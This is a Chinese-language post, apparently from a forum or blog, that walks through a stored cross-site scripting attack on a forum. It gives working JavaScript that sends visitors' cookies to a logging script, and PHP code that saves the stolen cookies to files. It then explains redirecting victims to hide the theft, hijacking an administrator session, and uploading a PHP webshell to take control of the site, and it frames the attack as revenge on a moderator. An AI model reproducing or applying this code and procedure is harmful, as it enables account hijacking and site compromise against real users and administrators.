論壇——>入侵者布置的跨站攻擊——>轉移被入侵這視線(隱蔽)

論壇插入腳本：

var img = new Image();

img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

但是我不一樣，因為他需要誘導人去點擊他的鏈接，但是現在人不是傻子，不會輕易點你的鏈接。而我是要把腳步插入論壇頁面中，這樣既隱蔽又省去了誘導的力氣

我插入的腳本如下：

**********************************************************************************************

**********************************************************************************************

跨站攻擊腳本：

reg.php

************************************************************************************

if (isset($_GET['var'])) {

file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));

}

?>

//轉移頁面隱蔽上面記錄cookie的操作

************************************************************************************

剩下的步驟就是等著魚自己上鉤了

當管理員帳號點入論壇某個頁面時，這個頁面卻被轉到了某新聞網站，其實不知，他的cookie已經被記錄

拿這個cookie登錄論壇，(刪東西不推薦哦~~)，可以臨時開啟上傳php文件，例如phpwebshell，然后再關閉，這樣你就可以很輕松的操控整個論壇站點

為什么選擇此論壇做入侵講解，很簡單，這個論壇具備了多個漏洞：

一、論壇有XSS漏洞，沒有對輸入輸出做過濾

二、論壇采用cookie方式記錄用戶信息

三、對論壇上某個版主看不慣，有點權利亂封號，不過，畢竟論壇不是那個人的，還是對管理員手下留情吧(做人要厚道！)